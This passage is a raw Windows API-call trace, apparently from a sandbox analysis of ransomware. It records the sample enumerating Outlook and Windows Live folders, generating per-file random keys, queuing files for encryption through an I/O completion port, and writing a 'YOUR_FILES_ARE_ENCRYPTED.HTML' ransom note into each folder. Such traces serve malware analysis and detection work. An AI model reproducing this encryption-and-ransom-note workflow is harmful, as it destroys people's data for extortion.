(in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="16") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="6E") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="A5") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="55") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="7F") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="9D") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="07") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="67") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="8C") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="CB") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="6F") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="95") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="A3") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="4A") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="46") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="27") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="13") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="EA") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="43") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="B2") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="6B") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="70") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="34") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="77") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="BD") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="2E") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="01") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="4E") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="5B") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="76") returned 2 [0163.558] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat" [0163.558] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.559] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.559] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x10b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat", cAlternateFileName="STE561~1.DAT")) returned 1 [0163.559] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat") returned 129 [0163.559] lstrcmpW (lpString1="Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.559] PathFindExtensionW (pszPath="Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat") returned=".dat" [0163.559] lstrlenW (lpString=".dat") returned 4 [0163.559] PathFindExtensionW (pszPath="Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat") returned=".dat" [0163.559] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_conversationprefs_2_83e4bc2203c4094dbf3eee441393be66.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.559] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=267) returned 1 [0163.559] CloseHandle (hObject=0x594) returned 1 [0163.559] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat", cAlternateFileName="STF81A~1.DAT")) returned 1 [0163.559] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat") returned 119 [0163.559] lstrcmpW (lpString1="Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.560] PathFindExtensionW (pszPath="Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat") returned=".dat" [0163.560] lstrlenW (lpString=".dat") returned 4 [0163.560] PathFindExtensionW (pszPath="Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat") returned=".dat" [0163.560] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_rssrule_2_d8b5947e63a68647a992edd6f0ac89d4.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.560] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=196) returned 1 [0163.560] CloseHandle (hObject=0x594) returned 1 [0163.560] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bc660f0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x11c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat", cAlternateFileName="ST7B66~1.DAT")) returned 1 [0163.560] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat") returned 133 [0163.560] lstrcmpW (lpString1="Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.560] PathFindExtensionW (pszPath="Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat") returned=".dat" [0163.560] lstrlenW (lpString=".dat") returned 4 [0163.560] PathFindExtensionW (pszPath="Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat") returned=".dat" [0163.560] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_tableviewpreviewprefs_2_cea763ee35e3b640818bfe4516517eba.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.562] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=284) returned 1 [0163.563] CloseHandle (hObject=0x594) returned 1 [0163.563] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6b32cbb0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6b32cbb0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0xcc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0163.563] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat") returned 119 [0163.563] lstrcmpW (lpString1="Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.571] PathFindExtensionW (pszPath="Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat") returned=".dat" [0163.572] lstrlenW (lpString=".dat") returned 4 [0163.572] PathFindExtensionW (pszPath="Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat") returned=".dat" [0163.572] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_tcprefs_2_e0983fefb6fd1d4ba2c919039ed642c6.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.572] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=204) returned 1 [0163.572] CloseHandle (hObject=0x5b8) returned 1 [0163.573] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x27c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat", cAlternateFileName="STREAM~4.DAT")) returned 1 [0163.573] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat") returned 121 [0163.573] lstrcmpW (lpString1="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.573] PathFindExtensionW (pszPath="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat") returned=".dat" [0163.573] lstrlenW (lpString=".dat") returned 4 [0163.573] PathFindExtensionW (pszPath="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat") returned=".dat" [0163.573] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_workhours_1_a1240b8d7d001341bae5fe73e3218ee4.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.574] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=636) returned 1 [0163.574] GetProcessHeap () returned 0x270000 [0163.574] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.575] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="39") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="1D") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="2D") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="9E") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="CC") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="C9") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="9F") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="BB") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="B2") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="48") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="66") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="29") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="A2") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="A8") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="76") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="A8") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="D1") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="C7") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="A0") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="E0") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="F9") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="D8") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="B2") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="DC") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CE") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="D4") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="AD") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="D9") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="B1") returned 2 [0163.577] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="5C") returned 2 [0163.577] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="24") returned 2 [0163.577] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="56") returned 2 [0163.577] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat" [0163.577] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.577] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.590] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x27c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat", cAlternateFileName="STREAM~4.DAT")) returned 0 [0163.590] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.590] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0163.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.590] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.593] CloseHandle (hObject=0x58c) returned 1 [0163.593] GetProcessHeap () returned 0x270000 [0163.594] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.594] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 0 [0163.594] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.594] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0163.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.595] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.597] CloseHandle (hObject=0x4a8) returned 1 [0163.597] GetProcessHeap () returned 0x270000 [0163.598] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.598] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x56fc1a00, ftLastAccessTime.dwHighDateTime=0x1d72468, ftLastWriteTime.dwLowDateTime=0x56fc1a00, ftLastWriteTime.dwHighDateTime=0x1d72468, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows", cAlternateFileName="")) returned 1 [0163.598] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa389d570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa389d570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Live", cAlternateFileName="WINDOW~4")) returned 1 [0163.598] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live") returned 60 [0163.598] GetProcessHeap () returned 0x270000 [0163.598] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.598] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live" [0163.598] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\*" [0163.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa389d570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa389d570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.599] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa389d570, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa389d570, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.599] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa389d570, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xaf9def90, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xaf9def90, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Bici", cAlternateFileName="")) returned 1 [0163.599] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Live\\Bici") returned 65 [0163.599] GetProcessHeap () returned 0x270000 [0163.599] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.600] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows 